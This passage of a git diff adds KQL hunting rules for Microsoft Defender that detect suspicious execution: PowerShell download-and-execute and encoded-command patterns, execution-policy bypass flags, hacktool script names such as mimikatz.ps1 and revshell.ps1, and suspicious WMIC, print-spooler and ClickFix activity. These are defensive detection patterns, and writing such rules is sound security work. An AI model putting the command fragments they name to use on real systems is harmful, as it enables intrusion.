b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-14 +// Level: high +// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql new file mode 100644 index 00000000..84cf0d77 --- /dev/null +++ b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql @@ -0,0 +1,12 @@ +// Title: Suspicious PowerShell Download and Execute Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-28 +// Level: high +// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Software installers that pull packages from remote systems and execute them + +DeviceProcessEvents +| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile(" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql new file mode 100644 index 00000000..9fdde349 --- /dev/null +++ b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql @@ -0,0 +1,12 @@ +// Title: Suspicious PowerShell Encoded Command Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-24 +// Level: high +// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Other tools that work with encoded scripts in the command line instead of script files + +DeviceProcessEvents +| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql new file mode 100644 index 00000000..633a6128 --- /dev/null +++ b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql @@ -0,0 +1,12 @@ +// Title: Suspicious PowerShell IEX Execution Patterns +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-24 +// Level: high +// Description: Detects suspicious ways to run Invoke-Execution using IEX alias +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate scripts that use IEX + +DeviceProcessEvents +| where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql new file mode 100644 index 00000000..111b5f53 --- /dev/null +++ b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql @@ -0,0 +1,10 @@ +// Title: Suspicious PowerShell Parameter Substring +// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) +// Date: 2019-01-16 +// Level: high +// Description: Detects suspicious PowerShell invocation with a parameter substring +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_powershell_parent_process.kql b/KQL/rules/Execution/suspicious_powershell_parent_process.kql new file mode 100644 index 00000000..efd2aef9 --- /dev/null +++ b/KQL/rules/Execution/suspicious_powershell_parent_process.kql @@ -0,0 +1,12 @@ +// Title: Suspicious PowerShell Parent Process +// Author: Teymur Kheirkhabarov, Harish Segar +// Date: 2020-03-20 +// Level: high +// Description: Detects a suspicious or uncommon parent processes of PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Other scripts + +DeviceProcessEvents +| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql new file mode 100644 index 00000000..327453f1 --- /dev/null +++ b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Process Created Via Wmic.EXE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-12 +// Level: high +// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_program_names.kql b/KQL/rules/Execution/suspicious_program_names.kql new file mode 100644 index 00000000..8682999e --- /dev/null +++ b/KQL/rules/Execution/suspicious_program_names.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Program Names +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-11 +// Level: high +// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate tools that accidentally match on the searched patterns + +DeviceProcessEvents +| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql new file mode 100644 index 00000000..3b5c4ad0 --- /dev/null +++ b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Remote Child Process From Outlook +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-12-27 +// Level: high +// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202 + +DeviceProcessEvents +| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql new file mode 100644 index 00000000..67f482ff --- /dev/null +++ b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Runscripthelper.exe +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects execution of powershell scripts via Runscripthelper.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_scan_loop_network.kql b/KQL/rules/Execution/suspicious_scan_loop_network.kql new file mode 100644 index 00000000..c077a6ca --- /dev/null +++ b/KQL/rules/Execution/suspicious_scan_loop_network.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Scan Loop Network +// Author: frack113 +// Date: 2022-03-12 +// Level: medium +// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018 +// False Positives: +// - Legitimate script + +DeviceProcessEvents +| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql new file mode 100644 index 00000000..c7016d0b --- /dev/null +++ b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Script Execution From Temp Folder +// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton +// Date: 2021-07-14 +// Level: high +// Description: Detects a suspicious script executions from temporary folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql new file mode 100644 index 00000000..9fc8ff46 --- /dev/null +++ b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql new file mode 100644 index 00000000..41f0eae7 --- /dev/null +++ b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_spool_service_child_process.kql b/KQL/rules/Execution/suspicious_spool_service_child_process.kql new file mode 100644 index 00000000..780ab3de --- /dev/null +++ b/KQL/rules/Execution/suspicious_spool_service_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Spool Service Child Process +// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule) +// Date: 2021-07-11 +// Level: high +// Description: Detects suspicious print spool service (spoolsv.exe) child processes. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068 + +DeviceProcessEvents +| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql new file mode 100644 index 00000000..ed17f3de --- /dev/null +++ b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Use of CSharp Interactive Console +// Author: Michael R. (@nahamike01) +// Date: 2020-03-08 +// Level: high +// Description: Detects the execution of CSharp interactive console by PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1127 +// False Positives: +// - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc. + +DeviceProcessEvents +| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql new file mode 100644 index 00000000..2378d6b1 --- /dev/null +++ b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql @@ -0,0 +1,12 @@ +// Title: Suspicious WindowsTerminal Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-25 +// Level: medium +// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence +// False Positives: +// - Other legitimate "Windows Terminal" profiles + +DeviceProcessEvents +| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat")))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql new file mode 100644 index 00000000..53421d60 --- /dev/null +++ b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious WMIC Execution Via Office Process +// Author: Vadim Khrykov, Cyb3rEng +// Date: 2021-08-23 +// Level: high +// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). +// MITRE Tactic: Execution +// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql new file mode 100644 index 00000000..96ab164a --- /dev/null +++ b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious WmiPrvSE Child Process +// 